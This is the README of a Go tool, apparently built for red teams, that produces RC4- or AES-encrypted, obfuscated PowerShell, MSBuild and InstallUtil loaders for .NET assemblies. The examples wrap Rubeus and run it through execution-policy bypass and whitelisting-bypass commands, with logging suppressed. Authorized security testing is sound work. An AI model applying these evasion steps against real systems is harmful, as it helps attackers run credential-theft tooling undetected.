path: root/README.md

# go-assembly-ldr

`go-assembly-ldr` is an offensive security tool designed for generating encrypted and obfuscated loaders for .NET assemblies. It supports PowerShell, MSBuild, and InstallUtil loader types, with RC4 or AES encryption, and provides variable obfuscation to evade (some) detection.

> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.

## Features

- **Loader Types**: Generate PowerShell (`.ps1`), MSBuild (`.csproj`), or InstallUtil (`.cs`) loaders.
- **Encryption**: Supports RC4 or AES (256-bit) encryption for assembly payloads.
- **Obfuscation**: Randomizes variable names in generated loaders to hinder static analysis.
- **Cross-Platform Builds**: Makefile supports building for Linux, Windows, and macOS (amd64, 386, arm64).
- **Customizable**: Configurable key length, obfuscation length, and .NET architecture (x86/x64 for MSBuild).

## Installation

### Prerequisites

- **Go**: Version 1.21 or later.
- **Make**: For building with the provided Makefile.
- **Git**: To clone the repository.

### Steps

- Clone the repository:

```
$ git clone https://github.com/your-username/go-assembly-ldr.git
$ cd go-assembly-ldr
```

- Install dependencies:

```
$ go mod tidy
```

- Build for all platforms:

```
$ make all
```

- Binaries will be generated in the build/ directory for Linux, Windows, and macOS; alternatively, build for a specific platform:

```
$ make linux-amd64
$ make windows-amd64
$ make darwin-arm64
```

- (Optional) Run directly with Go:

```
$ go run main.go -f <input_file> -t <loader_type> -e <encryption_type>
```

## Usage

### Command-Line Flags

```
Usage of ./go-assembly-ldr-<platform>-<arch>:
  -dotnet-architecture string
        .net architecture for msbuild: x86|x64 (default "x64")
  -e string
        encryption type: rc4|aes (default "rc4")
  -f string
        input file path
  -key-len int
        length of encryption key (default 32)
  -obf-len int
        length of obfuscated strings (default 8)
  -t string
        loader type: powershell|msbuild|installutil (default "powershell")
```

## Examples

### Generate an PowerShell Loader with AES Encryption

```
$ build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t powershell \
    -e aes \
    -obf-len 10 \
    -key-len 32
```

- Output: `Rubeus.exe_reflective.ps1`

- Run with: `powershell -ExecutionPolicy Bypass -File Rubeus.exe_reflective.ps1`

- Call the assembly method: `[<namespace>.<class>]::<method>("arg1 arg2".Split())`

### Generate an MSBuild Loader with RC4 Encryption

```
$ build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t msbuild \
    -e rc4 \
    -obf-len 12 \
    -key-len 16 \
    -dotnet-architecture x86
```

- Output: `Rubeus.exe_msbuild.csproj`

- Run with: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe Rubeus.exe_msbuild.csproj`

- Modify `string[] <var> = new string[] { "" };` in the .csproj to add arguments

### Generate an InstallUtil Loader with AES Encryption

```
$ build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t installutil \
    -e aes \
    -obf-len 8 \
    -key-len 32
```

- Output: `Rubeus.cs`

- Compile with: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /platform:x64 /out:Rubeus.exe Rubeus.cs`

- Execute with: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /LogToConsole=false Rubeus.exe`

## Automated Releases

Check the GitHub Releases page for the new release with attached binaries.

## License

This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.

## Disclaimer

`go-assembly-ldr` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.